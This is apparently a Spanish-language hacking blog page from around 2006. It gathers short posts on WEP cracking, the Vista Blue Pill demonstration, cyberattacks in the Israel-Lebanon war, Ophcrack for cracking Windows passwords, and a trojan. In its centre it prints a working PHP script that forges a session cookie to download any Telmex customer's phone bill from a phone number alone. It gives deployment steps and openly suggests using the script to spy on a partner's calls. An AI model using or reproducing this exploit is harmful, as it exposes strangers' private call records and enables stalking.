eBive.com

Si aun no lo tienes, puedes descargarlo desde el boton ubicado en la columna derecha

Este video muestra como en escasos 10 minutos se puede crackear una red wireless “protegida” con WEP de 128 bits, mediante un ataque de diccionario

El famosos sitio creado por Nullsoft y comprado por AOL, fue hackeado.

Hasta el momento de escribir este post el sitio aun estaba sin arreglar

Via

En el post anterior les comentaba hacerca del reto que hizo Microsoft a los hackers para encontrar fallas en su sistema operativo Windows Vista y no tardo mucho cuando ya salieron algunas fallas, entre ellas esta que les presento a continuacion.

Fueron por lana y salieron trasquilados. Tal y como estaba previsto, Microsoft habló sobre la seguridad de Windows Vista en Black Hat. Mientras tanto, en una sala contigua, la investigadora polaca Joanna Rutkowska (en la foto) mostraba cómo utilizar su técnica Blue Pill (más detalles técnicos aquí) para insertar código malicioso en las mismísimas entrañas de una copia de Windows Vista versión 64-bit.

Mas informacion

Todos sabemos de los problemas de seguridad que han afectado al SO de Microsoft. Incluso Microsoft está tratando de dejar tantos momentos embarazosos en la historia y ha invitado a 3.000 hackers o “expertos en seguridad informática” a probar una versión de prueba de Windows Vista con el fin de encontrar fallas de seguridad en el producto que saldrá a la venta el próximo año.

Esperemos que no se pasen de confiados y salgan perjudicados

Via

Hackers militares israelies atacan webs, interceptan y manipulan las televisiones y las radios libaneses con imagenes y mensajes de propaganda, incluso utilizan mensajes de texto y voz a móviles de la poblacion civil en su guerra psicológica contra el pueblo libanés. Por su parte, hackers árabes han atacado con éxito webs del gobierno israelí (http://www.mafhoum.com/press/cyber.htm)

Via

En el post anterior les hablaba de Offline NT Password & Registry Editor para resetear las contraseñas de Windows, esto lo vi en un post de Bitelia y aunque es una buena opcion muchas veces es mejor recuperar las contraseñas y no resetearlas porque puede ser que esa contraseña tambien sea la que usamos en alguna otra aplicacion y el recuperarla nos podria sacar de un apuro mayor.
Entonces para que resetear las contraseñas cuando las puedes recuperar.

Y para esto nada mejor que Ophcrack Live Cd, que es nada mas y nada menos una adaptacion de Slax (Linux) que con tiene la version 2.3 de Ophcrack, este famoso crackeador de password que te desencripta casi cualquier password de Windows en cuestion de segundos.

Solo basta introducir el Ophcrack Live Cd y reiniciar el equipo, si todo va bien no tendras que hacer nada mas que esperar ha que el Ophcrack recupere tus passwords.

De no inicar automaticamente la aplicacion no hay problema en la web de Ophcrack puedes encontrar la solucion.

Al momento la live cd va en la version 1.1, en lo personal yo tengo aun la Beta y aun esta me ha funcionado de maravilla,
Cabe aclarar que si tu has logrado conseguir el hash (password encriptado) del archivo SAM tambien puedes intentar desencriptarlo online

Anque existen otras aplicaciones con el mismo fin como

• PW Crack
• Openwall
• LCP
• Cain & Abel

Yo de cualquier maner me quedo con Ophcrack

Les dejo un interezante codigo con el cual se pueden hacer de casi cualquier recibo telefonico telmex.

Esto le puede servir por ejemplo a quienes quieran espiar las los numeros marcados desde el telefono de su novia, no sea que lo engañen con su mejor amigo. etc. etc.

/* Script para poder bajar los recibos de Telmex
Lo unico que hace es un GET enviando la cookie que todos conocen,
despues redirecciona al pdf generado.* This script is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* license: http://gnu.org/copyleft/gpl.html GNU GPL
* author : PonchoWare
* version: 1.0.0 2006-07-10
*/

$numtel = “NO”;
$mes = “00″;
if (isset($_GET['numtel'])) $numtel = $_GET['numtel'];
elseif (isset($_POST['numtel'])) $numtel = $_POST['numtel'];

if (isset($_GET['mes'])) $mes = $_GET['mes'];
elseif (isset($_POST['mes'])) $mes = $_POST['mes'];

if ($numtel != “NO” && $mes != “00″) {
/* Obtener la direccion IP del host de destino. */
$direccion = gethostbyname(‘www.online.telmex.com’);

/* Crear un socket TCP/IP. */
$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($socket < 0) {
exit(“socket_create() Error: “ . socket_strerror($socket) . “\n“);
}
$resultado = socket_connect($socket, $direccion, 80);
if ($resultado < 0) {
exit(“socket_connect() Error: ($resultado) “ . socket_strerror($resultado) . “\n“);
}

/* Hacer el GET */
$entrada = “GET /mitelmex/descargaRecibo.jsp?T=” . $numtel . “&M=2006″ . $mes . ” HTTP/1.1\r\n“;
$entrada .= “Host: www.online.telmex.com\r\n“;
$entrada .= “Cookie: user=123456%3a2%3a123456%3a” . $numtel . “%3a\r\n“;
$entrada .= “Connection: Close\r\n\r\n“;
$salida = ”;

socket_write($socket, $entrada, strlen($entrada));

/* Redireccionar */
$booEncontrado = false;
$redireccion = “”;
while ($salida = socket_read($socket, 1024)) {
if (strpos($salida, “http://recibo”)) {
$booEncontrado = true;
$redireccion = strstr($salida, “Location”);
$redireccion = substr(“$redireccion”,0,strpos($redireccion,“.pdf”)) . “.pdf”;
}
}

socket_close($socket);

if ($booEncontrado) {
header($redireccion);
}

Solo hay que guardar este codigo en un archivo llamado recibostelmex.php y subirlo a su sitio o hosting preferido, despues para acceder al recibo basta teclear www.misitio.com/recibotelmex.php?numtel=XXXXXXXXXX&mes=XX donde X es = al numero de telefono y mes correspondientes
NOTA: El uso de este codigo puede acarrear ciertas consecuencias, cada quien es responsable de la utilizacion que se le de al mismo y en lo personal no me hago reponsable por ello, asi que avisados estan

Visto en Ponchoware

Fue lanzada en una universidad escocesa una licenciatura en “Computer Hacking”. Exactamente se trata de University of Abertay in Dundee, y presenta la licenciatura Computer Hacking, empezando el próximo año académico en octubre.

Recordemos a nuestros lectores que los hackers no son aquellos que violan la seguridad de una red informática, sino aquellos que se divierten con la inteligencia… los primeros en realidad se denominan crackers

Via: Rompecadenas

La compañía de seguridad Websense Security Labs ha anunciado el descubrimiento de un troyano,  aún en fase de establecimiento o no distribuido todavía, en la IP del servicio gratuito de alojamiento de páginas de Google.

El código malicioso está comprimido en ASPack y  está diseñado para robar información sobre credenciales bancarias y permitir visitar determinadas páginas supuestamente financieras.

Las actualizaciones de seguridad ya han sido publicadas y en estos momento el troyano está bloqueado hasta que se produzca su catalogación.

Asi que si normalmente usan este servicio, les recomiendo actualizen sus antivirus

Via:  Shellsec